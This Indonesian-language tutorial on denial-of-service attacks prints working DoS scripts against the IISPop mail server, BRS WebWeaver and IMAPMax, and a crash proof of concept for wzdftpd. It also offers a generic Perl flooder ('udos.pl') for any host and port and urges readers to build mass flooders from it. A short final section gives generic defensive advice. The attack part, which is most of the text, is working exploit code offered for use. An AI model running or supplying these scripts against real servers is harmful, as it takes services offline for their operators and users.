1. Serangan kepada IISPop EMAIL Server.
Sofie : Email server Vendor : http://www.curtiscomp.com/ TIPE : Remote DoS IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes, versi yang vuneral dan telah di coba adalah V: 1.161 dan 1.181 Script: iispdos.pl #!/usr/bin/perl -w # # $0_ : iispdos.pl # Tipe serangan : Denial of service # Target : IISPop MAIL SERVER V. 1.161 & 1.181 # Auth : aRiee a.k.a sacrifice -> ariee@salutemus.co.uk # URL : www.sekuritionline.net# use IO::Socket; if (!$ARGV[0]) { print "Gunakan: perl iispdos.pl [host] \n"; exit; } # Data 289999 bytes $buff = "A" x 289999; print "Connecting ... >> $ARGV[0] \n"; $connect = new IO::Socket::INET ( PeerAddr=> "$ARGV[0]", PeerPort=> "110", Proto=> "tcp") or die; print "Error: $_\n"; print "Connect !!\n"; print $connect "$buff\n"; close $connect; print "Done \n"; print "POST TESTING setelah serangan \n"; print "TEST ... >> $ARGV[0] \n"; $connect = new IO::Socket::INET ( PeerAddr => "$ARGV[0]", PeerPort => "110", Proto => "tcp") or die; print "Done !!, $ARGV[0] TEWAS !! \n"; print "Gagal !! \n"; close $connect; # END.
2. Membunuh wzdftpd. Sofie : wzdftpd Vendor : http://www.wzdftpd.net Proof of Concept: % telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to localhost.novel.ru. Escape character is '^]'. 220 wzd server ready. USER guest 331 User guest okay, need password. PASS any 230 User logged in, proceed. PORT Connection closed by foreign host. % telnet 127.0.0.1 21 Trying 127.0.0.1... telnet: connect to address 127.0.0.1: Connection refused telnet: Unable to connect to remote host wzdftpd crash setelah diberikan perintah/command PORT !
3. Serangan 32700 karakter, DoS BRS WebWeaver. Sofie : BRS WebWeaver V. 1.04 Vendor : www.brswebweaver.com BugTraqer : euronymous /F0KP }------- start of fadvWWhtdos.py ---------------{ #! /usr/bin/env python ## #!/usr/bin/python ### # WebWeaver 1.04 Http Server DoS exploit # by euronymous /f0kp [http://f0kp.iplus.ru] ######## # Usage: ./fadvWWhtdos.py ######## import sys import httplib met = raw_input(""" What kind request you want make to crash webweaver?? [ HEAD/POST ]: """) target = raw_input("Type your target hostname [ w/o http:// ]: ") spl = "f0kp"*0x1FEF conn = httplib.HTTPConnection(target) conn.request(met, "/"+spl) r1 = conn.getresponse() print r1.status }--------- end of fadvWWhtdos.py ---------------{ Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !
4. Buffer Overflow pada MailMAX 5 Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10. Vendor : http://www.smartmax.com BugTraqer : matrix at 0x36.org Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command SELECT. Dampak dari serangan ini adalah berhentinya server dan harus di-restart secara manual. Contoh eksploitasi: --------[ transcript ]------- nc infowarfare.dk 143 * OK IMAP4rev1 SmartMax IMAPMax 5 Ready 0000 CAPABILITY * CAPABILITY IMAP4rev1 0000 OK CAPABILITY completed 0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword" 0001 OK User authenticated. 0002 SELECT "aaa...[256]...aaaa" --------[ transcript ]-------

Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat' Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja - membanjiri input dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada komputer esekutor yang memiliki bandwidth lebar. Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.
Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS. Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim). -- udos.pl -- #!/usr/bin/perl # # $0 : udos.pl # Auth : aRiee a.k.a sacrifice -> ariee@salutemus.co.uk # URL : www.sekuritionline.net # use IO::Socket; # if (!$ARGV[2]) { print "Gunakan % perl udos.pl [host] [port] [data] \n"; print "Contoh :\n"; print "\t $ perl udos.pl 127.0.0.1 21 50000 \n"; exit; } # Siapkan data $buffer = "A" x $ARGV[2]; # Connect -> Korban print "Connecting ... -> $ARGV[0] \n"; $con = new IO::Socket::INET ( PeerAddr=> "$ARGV[0]", PeerPort=> "$ARGV[1]", Proto=> "tcp") or die; print "Error: $_ \n"; # Connect ! print "Connect !! \n"; print $con "$buffer\n"; close $con; print "Done. \n"; print "POST TESTING setelah serangan \n"; print "TEST ... >> $ARGV[0] \n"; $connect = new IO::Socket::INET ( PeerAddr => "$ARGV[0]", PeerPort => "$ARGV[1]", Proto => "tcp") or die; print "Done !!, $ARGV[0] TEWAS !! \n"; print "Gagal !! \n"; close $connect; # End. -- udos.pl --

Skrip sederhana diatas hanya melakukan hubungan dengan server korban, lalu mengirimkan flood dan melakukan post testing. Dengan sedikit pemprograman anda dapat membuat sebuah 'Mass Flooder' atau 'Brute Force Flooder', tergantung pada kreatifitas anda !

.o0 Penanggulangan serangan Denial of Service Sejujurnya, bagian inilah yang paling sulit. Anda bisa lihat bagaimana mudahnya menggunaka sploits/tool untuk membekukan Ms Windows, atau bagaimana mudahnya melakukan input flooding dan membuat tool sendiri. Namun Denial of service adalah masalah layanan publik. Sama halnya dengan anda memiliki toko, sekelompok orang jahat bisa saja masuk beramai-ramai sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan 'menutup' toko anda - dan ini adalah cara paling efektif - namun jawaban kekanak-kanakan demikian tentu tidak anda harapkan.
1. Selalu Up 2 Date. Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option untuk menolak cracker untuk mengakses system.
2. Ikuti perkembangan security Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal. Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet' dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak - tidak tertutup kemungkinan untuk melakukan Denial of Service -. Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara langsung dengan Flooding dapat diatasi dengan menginstall patch terbaru dari vendor atau melakukan up-date.
3. Teknik pengamanan httpd Apache. + Pencegahan serangan Apache Benchmark. Hal ini sebenarnya sangat sulit untuk diatasi. Anda bisa melakukan identifikasi terhadap pelaku dan melakukan pemblokiran manual melalui firewall atau mekanisme kontrol Apache (Order, Allow from, Deny From ). Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang admin harus teliti. Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'. Jangan lupa juga menambah RAM.
4. Pencegahan serangan non elektronik. Serangan yang paling efektif pada dasarnya adalah local. Selain efektif juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman, atau semua user adalah orang 'baik'. Pertimbangkan semua aspek. Anda bisa menerapkan peraturan tegas dan sanksi untuk mencegah user melakukan serangan dari dalam. Mungkin cukup efektif jika dibantu oleh kedewasaan berfikir dari admin dan user bersangkutan.

NB : kalo ada salah kata mohon maaf yang sebesar besarnya
Google PageRank Checker